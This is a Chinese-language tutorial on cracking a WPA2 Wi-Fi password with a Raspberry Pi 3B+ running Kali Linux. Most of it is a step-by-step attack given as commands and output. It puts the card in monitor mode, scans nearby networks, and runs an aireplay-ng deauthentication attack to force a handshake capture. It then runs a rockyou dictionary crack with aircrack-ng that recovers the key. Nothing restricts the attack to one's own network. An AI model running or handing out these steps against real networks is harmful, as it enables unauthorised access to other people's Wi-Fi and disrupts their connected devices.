树莓派3B+ 破解Wi-Fi密码
树莓派3B已经成为arm主流开发板,不仅有成熟完善的raspbian系统,还可以安装Ubuntu、Centos、Kali系统,因此,树莓派可以做各种各样的事,接下来,我就介绍下树莓派破解Wi-Fi密码的过程。
1.安装Kali
因为Kali是一个专门的网络渗透系统,自带很多工具,所以就采用直接安装Kali来使用airmon-ng工具。
下载地址:https://www.offensive-security.com/kali-linux-arm-images/
下载下来是kali-2017.3-rpi3-nexmon.img.xz文件。
在Windows下直接使用解压缩软件解压。
在Linux下用 xz -d kali-2017.3-rpi3-nexmon.img.xz 解压。得到的img文件就可以直接使用了,将其写入TF卡即可。
2.升级Kali
将树莓派插上显示屏和鼠标键盘。
用户:root
密码:toor
# 打开Terminal,执行
echo "deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free" > /etc/apt/sources.list
apt update && apt upgrade -y
# 安装完整版kali
# apt install kali-linux-all
# 安装Extend Filesystem(可选)
# apt install gparted -y
# 安装xrdp [不能插上显示屏使用]
# apt install xrdp
# 开机自启
# update-rc.d xrdp enable
3.开始破解
破解过程如下:
- 找到设备iwconfig并开启监控
- 查看附近的Wi-Fi,并选择一个
- 攻击并开始抓包,得到handshake
- 下载字典,开始破解
# 查看得到网卡名为wlan0:
iwconfig
# 内容如下:
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any ...
# 找到Wi-Fi代号为wlan0,接着启动monitor模式:
airmon-ng start wlan0
# 查看附近的无线网络
airodump-ng wlan0mon
# 内容如下:
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F2:B4:29:E5:1C:74 -1 0 20 0 6 -1 OPN <length: 0>
94:77:2B:47:92:1C -74 119 1842 49 7 54e WPA2 CCMP PSK HUAWEI-RF4BXM
14:75:90:DB:90:91 -81 53 0 0 11 54e. WPA2 CCMP PSK TP-LINK_DB9091
# 选择一个Wi-Fi,复制BSSID,记下CH信道,组合如下命令开始攻击抓包
# [演示选择TP-Link:airodump-ng wlan0mon --bssid 复制的BSSID -c CH信道 -w 保存名]
airodump-ng wlan0mon --bssid 14:75:90:DB:90:91 -c 11 -w wificrack
# 可以看到,有一台设备连接到该路由WiFi,但此时没有设备连入,故抓不到完整4步握手包。
# 若抓不到4步握手,则通过以下命令断开设备与WiFi的连接,使其重新建立连接从而可以抓取四步握手信息:
# 新开一个Terminal窗口:[参数:攻击2次,路由ssid和设备Mac地址]
aireplay-ng -0 2 -a 14:75:90:DB:90:91 -c 54:DC:1D:27:0D:50 wlan0mon
# 原窗口得到握手包:内容如下:
CH 11 ][ Elapsed: 5 mins ][ 2018-01-29 05:52 ][ WPA handshake: 14:75:90:DB:90:91
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:75:90:DB:90:91 -71 93 3136 43 0 11 54e. WPA2 CCMP PSK TP-LINK_DB9091
BSSID STATION PWR Rate Lost Frames Probe
14:75:90:DB:90:91 54:DC:1D:27:0D:50 -39 0e- 0e 0 44 TP-LINK_DB9091
通过ls wificrack*命令查看抓到的信息保存的文件(多的wpa包是之前做测试保存下来的):
这里看最新的那个即wifi-04即可,可以看到总共有4个。
# 后面使用Kali Linux中默认存在的字典,目录[需要使用命令来解压]
/usr/share/wordlists/rockyou.txt.zip
# 这里顺便记录一下Kali中几个常用的字典文件的位置:
/usr/share/john/password.lst
/usr/share/wfuzz/wordlist
/usr/share/ wordlists
# 如果没有该文件,就需要下载:
wget http://scrapmaker.com/data/wordlists/dictionaries/rockyou.txt
# 破解:[rockyou.txt是字典、wifi-01.cap是抓包]
aircrack-ng -w rockyou.txt wificrack-01.cap
# 结果如下:[密码为:12345678]
Aircrack-ng 1.2 rc4
[00:00:00] 4/4 keys tested (31.56 k/s)
Time left: 0 seconds 100.00%
KEY FOUND! [ 12345678 ]
# 关闭wlan0无线网卡monitor mode
airmon-ng stop wlan0mon